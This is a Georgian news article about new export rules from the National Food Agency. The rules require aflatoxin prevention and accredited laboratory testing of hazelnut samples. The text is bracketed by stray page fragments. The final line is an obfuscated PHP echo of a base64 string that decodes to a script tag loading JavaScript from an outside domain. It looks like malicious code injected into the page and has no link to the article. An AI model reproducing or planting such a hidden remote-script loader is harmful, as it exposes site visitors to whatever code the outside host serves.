celsiusi
ავერსი საქკაბელი

 საქართველოს სურსათის ეროვნული სააგენტოს ინფორმაციით, ქვეყნიდან თხილის ექსპორტზე დამატებითი მოთხოვნები ამოქმედდა. უწყების თანახხმად, ეს ცვლილებები ქართული ნორმების ევროდირექტივასთან თანხვედრაში მოყვანას ისახავს მიზნად და ის თხილის ნიმუშების კვლევას შეეხება.

სურსათის ეროვნული სააგენტოს ინფორმაციით, საუბარია თხილში ალფატოქსინების შემცირებასა და საკვებ პროდუქტებში მათი მოხვედრის პრევენციაზე, რისთვისაც, მეწარმეებს დამატებითი ლაბორატორიული კვლევები დასჭირდებათ.

"ბიზნესოპერატორი ვალდებულია, თხილში აფლატოქსინის პრევენცია და შემცირება ტექნიკური რეგლამენტის შესაბამისად უზრუნველყოს.

დამატებითი მოთხოვნები შეეხება პირველად წარმოებასა და მასთან დაკავშირებულ პროცედურებს, საწარმოში თხილის გადამუშავების პროცესს, სატრანსპორტო კონტეინერებსა და გადამუშავებული პროდუქტის დასაწყობების ადგილამდე ტრანსპორტირებას, ასევე პროდუქციის დასაწყობებას.

სურსათის ეროვნული სააგენტოს უფლებამოსილი პირის თანდასწრებით აღებული საექსპორტო თხილის ნიმუშის გამოკვლევა უნდა განხორციელდეს ISO/IEC 17025 სტანდარტის შესაბამისად იმ აკრედიტებულ ლაბორატორიაში, რომელიც უზრუნველყოფს „სურსათში მიკოტოქსინების განსაზღვრისათვის ნიმუშის აღებისა და ანალიზის მეთოდების შესახებ ტექნიკური რეგლამენტის დამტკიცების თაობაზე“ საქართველოს მთავრობის 2016 წლის 7 ნოემბრის №497 დადგენილებითა და „ტექნიკური რეგლამენტით − სურსათში მიკროელემენტებისა და დამაბინძურებლების (კონტამინანტები) რაოდენობის კონტროლისათვის ნიმუშის აღებისა და ანალიზის მეთოდების შესახებ“ საქართველოს მთავრობის 2016 წლის 13 დეკემბრის №547 დადგენილებით განსაზღვრული მოთხოვნების შესრულებას.

აღნიშნული ტექნიკური რეგლამენტის რეგულირების სფეროში შედის:

  1. გაუტეხავი თხილი (თხილი ნაჭუჭით);
  2. თხილის გული, რომელიც არ დაექვემდებარა დამარილებას, დაშაქვრას, მოხალვას ან სხვა სახის დამუშავებას;
  3. გადამუშავებული თხილის გული, განკუთვნილი პირდაპირი მოხმარებისათვის ან სხვა სურსათში შერევისათვის, რომელიც გამოიყენება შემდგომი გადამუშავების გარეშე და არ დაექვემდებარა დამარილებას, დაშაქვრას, მოხალვას, არომატიზებას ან სხვა სახის დამუშავებას.

„თხილის შესახებ ტექნიკური რეგლამენტის დამტკიცების თაობაზე“ საქართველოს მთავრობის №185 დადგენილების კონსოლიდირებული ვერსია შეგიძლიათ ჩამოტვირთოთ სურსათის ეროვნული სააგენტოს ვებგვერდიდან (მთავრობის დადგენილებები - უნივერსალური): https://nfa.gov.ge/Ge/Legislation,"-ნათქვამია სურსათის ეროვნული სააგენტოს მიერ გავრცელებულ ინფორმაციაში.

118
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");